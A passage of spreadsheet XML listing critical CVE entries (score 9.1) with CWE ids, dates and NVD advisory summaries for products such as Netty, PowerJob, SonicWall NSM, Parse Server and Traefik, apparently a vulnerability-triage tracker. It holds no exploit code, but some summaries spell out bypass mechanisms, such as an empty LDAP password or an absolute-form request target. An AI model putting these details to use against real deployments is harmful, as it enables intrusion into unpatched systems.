          <t>CVE-2026-75340</t>
        </is>
      </c>
      <c r="C673" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D673" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E673" s="5" t="inlineStr"/>
      <c r="F673" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G673" s="5" t="inlineStr"/>
      <c r="H673" s="5" t="inlineStr"/>
      <c r="I673" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J673" s="5" t="inlineStr"/>
      <c r="K673" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L673" s="5" t="inlineStr">
        <is>
          <t>The device metadata import interface /device/instance/{productId}/property-metadata/import of jetlinks community 2.11 is vulnerable to Server-side request forgery (SSRF).</t>
        </is>
      </c>
      <c r="M673" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75340</t>
        </is>
      </c>
    </row>
    <row r="674">
      <c r="A674" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B674" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75431</t>
        </is>
      </c>
      <c r="C674" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D674" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E674" s="5" t="inlineStr"/>
      <c r="F674" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G674" s="5" t="inlineStr"/>
      <c r="H674" s="5" t="inlineStr"/>
      <c r="I674" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J674" s="5" t="inlineStr"/>
      <c r="K674" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="L674" s="5" t="inlineStr">
        <is>
          <t>PowerJob Server version 5.1.2 (and likely earlier) uses a predictable JWT signing key for HS256-based authentication. This allows a remote attacker to execute arbitrary code.</t>
        </is>
      </c>
      <c r="M674" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75431</t>
        </is>
      </c>
    </row>
    <row r="675">
      <c r="A675" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B675" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75595</t>
        </is>
      </c>
      <c r="C675" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D675" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E675" s="5" t="inlineStr"/>
      <c r="F675" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G675" s="5" t="inlineStr">
        <is>
          <t>.net</t>
        </is>
      </c>
      <c r="H675" s="5" t="inlineStr"/>
      <c r="I675" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J675" s="5" t="inlineStr"/>
      <c r="K675" s="5" t="inlineStr">
        <is>
          <t>CWE-754</t>
        </is>
      </c>
      <c r="L675" s="5" t="inlineStr">
        <is>
          <t>Netty is an asynchronous, event-driven network application framework. Prior to 4.1.137.Fina and 4.2.17.Final, io.netty.handler.ssl.SslClientHelloHandler#decode checks the wrong offset before reading the four-byte TLS handshake header, so a ClientHello whose handshake header spans records can cause an IndexOutOfBoundsException and invoke select(ctx, null). This selects the default SslContext instead of the SNI-specific context. In deployments where per-SNI clientAuth=REQUIRE is the sole mutual TLS gate, the default SslContext uses clientAuth=NONE or clientAuth=OPTIONAL, and no application-layer certificate verification exists, an unauthenticated remote attacker can bypass the protected route's mutual TLS requirement. This issue is fixed in versions 4.1.137.Final and 4.2.17.Final.</t>
        </is>
      </c>
      <c r="M675" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75595</t>
        </is>
      </c>
    </row>
    <row r="676">
      <c r="A676" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B676" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75746</t>
        </is>
      </c>
      <c r="C676" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D676" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E676" s="5" t="inlineStr"/>
      <c r="F676" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G676" s="5" t="inlineStr"/>
      <c r="H676" s="5" t="inlineStr"/>
      <c r="I676" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J676" s="5" t="inlineStr"/>
      <c r="K676" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L676" s="5" t="inlineStr">
        <is>
          <t>ColdFusion is affected by an Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability that could result in arbitrary code execution in the context of the current user. An attacker with high privileges could exploit this vulnerability to execute arbitrary code. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="M676" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75746</t>
        </is>
      </c>
    </row>
    <row r="677">
      <c r="A677" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B677" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77337</t>
        </is>
      </c>
      <c r="C677" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D677" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E677" s="5" t="inlineStr"/>
      <c r="F677" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G677" s="5" t="inlineStr"/>
      <c r="H677" s="5" t="inlineStr"/>
      <c r="I677" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J677" s="5" t="inlineStr"/>
      <c r="K677" s="5" t="inlineStr">
        <is>
          <t>CWE-290, CWE-770</t>
        </is>
      </c>
      <c r="L677" s="5" t="inlineStr">
        <is>
          <t>CakePHP Authentication is an authentication plugin for CakePHP that can also be used in PSR-7 based applications. Versions before 2.11.2, from 3.0.0 through 3.3.6, and from 4.0.0 through 4.2.0 allow authentication bypass and potential CPU or memory exhaustion when CookieAuthenticator uses unencrypted, forgeable legacy tokens. This issue is fixed in versions 2.11.2, 3.3.7, and 4.2.1.</t>
        </is>
      </c>
      <c r="M677" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77337</t>
        </is>
      </c>
    </row>
    <row r="678">
      <c r="A678" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B678" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78327</t>
        </is>
      </c>
      <c r="C678" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D678" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E678" s="5" t="inlineStr"/>
      <c r="F678" s="5" t="n">
        <v>0.016</v>
      </c>
      <c r="G678" s="5" t="inlineStr"/>
      <c r="H678" s="5" t="inlineStr"/>
      <c r="I678" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J678" s="5" t="inlineStr"/>
      <c r="K678" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L678" s="5" t="inlineStr">
        <is>
          <t>An Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in the SonicWall Network Security Manager (NSM) On-Prem Management interface allows an authenticated attacker with SuperAdmin privileges to inject arbitrary commands that are executed on the underlying host, resulting in remote code execution.</t>
        </is>
      </c>
      <c r="M678" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78327</t>
        </is>
      </c>
    </row>
    <row r="679">
      <c r="A679" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B679" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78328</t>
        </is>
      </c>
      <c r="C679" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D679" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E679" s="5" t="inlineStr"/>
      <c r="F679" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G679" s="5" t="inlineStr"/>
      <c r="H679" s="5" t="inlineStr"/>
      <c r="I679" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J679" s="5" t="inlineStr"/>
      <c r="K679" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L679" s="5" t="inlineStr">
        <is>
          <t>A missing authorization vulnerability in the SonicWall Network Security Manager (NSM) On-Prem Management interface allows a lower-privileged Admin user to escalate privileges to SuperAdmin.</t>
        </is>
      </c>
      <c r="M679" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78328</t>
        </is>
      </c>
    </row>
    <row r="680">
      <c r="A680" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B680" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78361</t>
        </is>
      </c>
      <c r="C680" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D680" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E680" s="5" t="inlineStr"/>
      <c r="F680" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G680" s="5" t="inlineStr"/>
      <c r="H680" s="5" t="inlineStr"/>
      <c r="I680" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J680" s="5" t="inlineStr"/>
      <c r="K680" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L680" s="5" t="inlineStr">
        <is>
          <t>The zipMoney(Zip Co) Payments Plugin for WooCommerce WordPress plugin before 2.4.0 does not perform any authorisation checks on one of its front-end request handlers, and does not restrict which option name a caller may supply, allowing unauthenticated users to delete arbitrary WordPress options. This can be used to destroy site and access control configuration, deactivate every installed zipMoney(Zip Co) Payments Plugin for WooCommerce WordPress plugin before 2.4.0, and take the site offline.</t>
        </is>
      </c>
      <c r="M680" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78361</t>
        </is>
      </c>
    </row>
    <row r="681">
      <c r="A681" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B681" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79571</t>
        </is>
      </c>
      <c r="C681" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D681" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E681" s="5" t="inlineStr"/>
      <c r="F681" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G681" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="H681" s="5" t="inlineStr"/>
      <c r="I681" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J681" s="5" t="inlineStr"/>
      <c r="K681" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L681" s="5" t="inlineStr">
        <is>
          <t>Incorrect access control in the SellerAuthorizeAspect component of springboot-project v1.0.0 allows unauthenticated attackers to access all seller management interfaces and list all products/orders, put products on/off sale, finish/cancel orders, and modify categories without authentication.</t>
        </is>
      </c>
      <c r="M681" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79571</t>
        </is>
      </c>
    </row>
    <row r="682">
      <c r="A682" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B682" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80164</t>
        </is>
      </c>
      <c r="C682" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D682" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E682" s="5" t="inlineStr"/>
      <c r="F682" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G682" s="5" t="inlineStr"/>
      <c r="H682" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I682" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J682" s="5" t="inlineStr"/>
      <c r="K682" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L68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682" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80164</t>
        </is>
      </c>
    </row>
    <row r="683">
      <c r="A683" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B683" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80181</t>
        </is>
      </c>
      <c r="C683" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D683" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E683" s="5" t="inlineStr"/>
      <c r="F683" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G683" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H683" s="5" t="inlineStr"/>
      <c r="I683" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J683" s="5" t="inlineStr"/>
      <c r="K683" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L683" s="5" t="inlineStr">
        <is>
          <t>Apache Allura's webhooks are vulnerable to Server-Side Request Forgery (SSRF).
This issue affects Apache Allura: through 1.20.0.
Users are recommended to upgrade to version 1.21.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M683" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80181</t>
        </is>
      </c>
    </row>
    <row r="684">
      <c r="A684" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B684" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80424</t>
        </is>
      </c>
      <c r="C684" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D684" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E684" s="5" t="inlineStr"/>
      <c r="F684" s="5" t="inlineStr"/>
      <c r="G684" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H684" s="5" t="inlineStr"/>
      <c r="I684" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J684" s="5" t="inlineStr"/>
      <c r="K684" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L684" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to create arbitrary files due to path traversal during archive extraction.</t>
        </is>
      </c>
      <c r="M684" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80424</t>
        </is>
      </c>
    </row>
    <row r="685">
      <c r="A685" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B685" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81468</t>
        </is>
      </c>
      <c r="C685" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D685" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E685" s="5" t="inlineStr"/>
      <c r="F685" s="5" t="inlineStr"/>
      <c r="G685" s="5" t="inlineStr"/>
      <c r="H685" s="5" t="inlineStr"/>
      <c r="I685" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J685" s="5" t="inlineStr"/>
      <c r="K685" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L685" s="5" t="inlineStr">
        <is>
          <t>Dell ThinOS 10, versions prior to 2605_10. 2616, contains an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to Command execution.</t>
        </is>
      </c>
      <c r="M685" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81468</t>
        </is>
      </c>
    </row>
    <row r="686">
      <c r="A686" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B686" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81939</t>
        </is>
      </c>
      <c r="C686" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D686" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E686" s="5" t="inlineStr"/>
      <c r="F686" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G686" s="5" t="inlineStr"/>
      <c r="H686" s="5" t="inlineStr"/>
      <c r="I686" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J686" s="5" t="inlineStr"/>
      <c r="K686" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L686" s="5" t="inlineStr">
        <is>
          <t>A Zip Slip vulnerability in the SonicWall Network Security Manager (NSM) On-Prem file upload and archive processing functionality allows an attacker to extract files outside the intended destination directory using a specially crafted archive.</t>
        </is>
      </c>
      <c r="M686" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81939</t>
        </is>
      </c>
    </row>
    <row r="687">
      <c r="A687" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B687" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84939</t>
        </is>
      </c>
      <c r="C687" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D687" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E687" s="5" t="inlineStr"/>
      <c r="F687" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G687" s="5" t="inlineStr">
        <is>
          <t>java, apache</t>
        </is>
      </c>
      <c r="H687" s="5" t="inlineStr"/>
      <c r="I687" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J687" s="5" t="inlineStr"/>
      <c r="K687" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="L687" s="5" t="inlineStr">
        <is>
          <t>Path traversal vulnerability in Apache FreeMarker template loading mechanism, if the attacker can specify an arbitrary malformed locale identifier to FreeMarker, and the localized lookup configuration setting is enabled (it's by default enabled).
This issue affects Apache FreeMarker from 2.2.0 through 2.3.34.
Users are recommended to upgrade to version 2.3.35. Disabling localized lookup in previous versions also mitigates this.
Note that even in versions affected by this vulnerability, the files that can be loaded remain restricted by the TemplateLoader that FreeMarker is configured to use. In particular, FileTemplateLoader prevents attempts to traverse outside the baseDir specified in its constructor. Other TemplateLoader implementations may allow access outside their designated base directory, but they are still constrained by the underlying storage mechanism—for example, a loader wrapping a Java class loader can only access resources that the class loader can load, while one wrapping a web application context can only access resources available through that context.</t>
        </is>
      </c>
      <c r="M687" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84939</t>
        </is>
      </c>
    </row>
    <row r="688">
      <c r="A688" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B688" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85043</t>
        </is>
      </c>
      <c r="C688" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D688" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E688" s="5" t="inlineStr"/>
      <c r="F688" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G688" s="5" t="inlineStr"/>
      <c r="H688" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I688" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J688" s="5" t="inlineStr"/>
      <c r="K688" s="5" t="inlineStr">
        <is>
          <t>CWE-459</t>
        </is>
      </c>
      <c r="L688" s="5" t="inlineStr">
        <is>
          <t>Incomplete cleanup in Network in Google Chrome prior to 152.0.7977.82 allowed a remote attacker to bypass system access restrictions via crafted network traffic. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M688" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85043</t>
        </is>
      </c>
    </row>
    <row r="689">
      <c r="A689" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B689" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85184</t>
        </is>
      </c>
      <c r="C689" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D689" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E689" s="5" t="inlineStr"/>
      <c r="F689" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G689" s="5" t="inlineStr"/>
      <c r="H689" s="5" t="inlineStr"/>
      <c r="I689" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J689" s="5" t="inlineStr"/>
      <c r="K689" s="5" t="inlineStr">
        <is>
          <t>CWE-436</t>
        </is>
      </c>
      <c r="L689" s="5" t="inlineStr">
        <is>
          <t>@fastify/middie versions &gt;= 9.1.0 and before 9.3.4 decide whether to run path-scoped middleware by matching against the raw request target, while the Fastify router resolves an absolute-form request target to its path before dispatching. Because the two layers evaluate different strings, a request using an absolute-form target reaches the route handler while the path-scoped middleware, such as authentication or authorization, is skipped. An unauthenticated network attacker can use this to bypass path-based access controls in a Fastify application that relies on middie for those controls. Users should upgrade to @fastify/middie 9.3.4 or later.</t>
        </is>
      </c>
      <c r="M689" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85184</t>
        </is>
      </c>
    </row>
    <row r="690">
      <c r="A690" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B690" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86729</t>
        </is>
      </c>
      <c r="C690" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D690" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E690" s="5" t="inlineStr"/>
      <c r="F690" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G690" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H690" s="5" t="inlineStr"/>
      <c r="I690" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J690" s="5" t="inlineStr"/>
      <c r="K690" s="5" t="inlineStr">
        <is>
          <t>CWE-307</t>
        </is>
      </c>
      <c r="L690" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit e01e41ecc (no patched version available) exposes get_api_preauthorize in plugin/API/API.php as a second, undocumented login path. Unlike get_api_signIn, which enforces a rate limit of 10 attempts per 5 minutes via checkRateLimit(), get_api_preauthorize performs the same credential check with no throttling for any client, allowing unlimited remote password guessing against arbitrary accounts, including admin. The endpoint also acts as a credential oracle: it returns the message "Invalid credentials" for both correct and incorrect passwords, while the users_id field in the response body discloses the authenticated identity (users_id:1 on success, users_id:0 on failure), and a correct password establishes a session cookie that remains usable for authenticated API requests. Together these issues permit unauthenticated brute-force account takeover.</t>
        </is>
      </c>
      <c r="M690" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86729</t>
        </is>
      </c>
    </row>
    <row r="691">
      <c r="A691" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B691" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86840</t>
        </is>
      </c>
      <c r="C691" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D691" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E691" s="5" t="inlineStr"/>
      <c r="F691" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G691" s="5" t="inlineStr"/>
      <c r="H691" s="5" t="inlineStr"/>
      <c r="I691" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J691" s="5" t="inlineStr"/>
      <c r="K691" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="L691" s="5" t="inlineStr">
        <is>
          <t>The `vtoken-minting` and `slpx` pallets in Bifrost contain an improper authorization vulnerability in channel commission attribution. A signed account can supply an arbitrary registered `channel_id` when minting tokens without verifying that the caller is authorized to mint on behalf of that channel. This allows an attacker to inflate a channel's recorded mint volume and cause protocol commission payments to be disproportionately distributed to that channel during commission settlement.</t>
        </is>
      </c>
      <c r="M691" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86840</t>
        </is>
      </c>
    </row>
    <row r="692">
      <c r="A692" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B692" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87806</t>
        </is>
      </c>
      <c r="C692" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D692" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E692" s="5" t="inlineStr"/>
      <c r="F692" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G692" s="5" t="inlineStr">
        <is>
          <t>active directory</t>
        </is>
      </c>
      <c r="H692" s="5" t="inlineStr"/>
      <c r="I692" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J692" s="5" t="inlineStr"/>
      <c r="K692" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L692" s="5" t="inlineStr">
        <is>
          <t>Parse Server versions &lt;= 8.6.87 and &gt;= 9.0.0 &lt; 9.10.1-alpha.7 contain an authentication bypass in the built-in LDAP authentication adapter. The adapter forwarded the client-supplied password to the directory without verifying that a password had been supplied, and treated any non-error response from the directory as proof of authentication. A zero-length credential turns an LDAP simple bind into the unauthenticated authentication mechanism described in RFC 4513 section 5.1.2, which some directories (including Active Directory in its default configuration) answer with success while mapping the connection to anonymous. As a result, an unauthenticated attacker who knows a directory username can obtain a valid session token for that account, resulting in account takeover. Only deployments that enable the LDAP authentication adapter are affected, and deployments whose directory refuses unauthenticated simple bind (such as a stock OpenLDAP configuration) are not exploitable. The issue is fixed in 8.6.88 and 9.10.1-alpha.7, which require the password to be a non-empty string and reject the request before contacting the directory.</t>
        </is>
      </c>
      <c r="M692" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87806</t>
        </is>
      </c>
    </row>
    <row r="693">
      <c r="A693" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B693" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88007</t>
        </is>
      </c>
      <c r="C693" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D693" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E693" s="5" t="inlineStr"/>
      <c r="F693" s="5" t="inlineStr"/>
      <c r="G693" s="5" t="inlineStr"/>
      <c r="H693" s="5" t="inlineStr"/>
      <c r="I693" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J693" s="5" t="inlineStr"/>
      <c r="K693" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-863</t>
        </is>
      </c>
      <c r="L693" s="5" t="inlineStr">
        <is>
          <t>Traefik is an open source HTTP reverse proxy and load balancer. From 2.11.0 until 2.11.57 and 3.7.13, the HTTP/3 entrypoint ConnContext does not call service.AddTransportOnContext, so kerberosRoundTripper uses a shared backend transport instead of a transport dedicated to each frontend connection. With HTTP/3 enabled, a backend using connection-bound NTLM or Negotiate authentication, and backend keep-alive, an unrelated client can reuse a backend connection authenticated for a victim, read victim-only data, and act as that victim without the victim credentials. This issue is fixed in 2.11.57 and 3.7.13.</t>
        </is>
      </c>
      <c r="M693" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88007</t>
        </is>
      </c>
    </row>
    <row r="694">
      <c r="A694" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B694" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88044</t>
        </is>
      </c>
      <c r="C694" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D694" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E694" s="5" t="inlineStr"/>
      <c r="F694" s="5" t="inlineStr"/>
      <c r="G694" s="5" t="inlineStr"/>
      <c r="H694" s="5" t="inlineStr"/>
      <c r="I694" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J694" s="5" t="inlineStr"/>
      <c r="K694" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L694" s="5" t="inlineStr">
        <is>
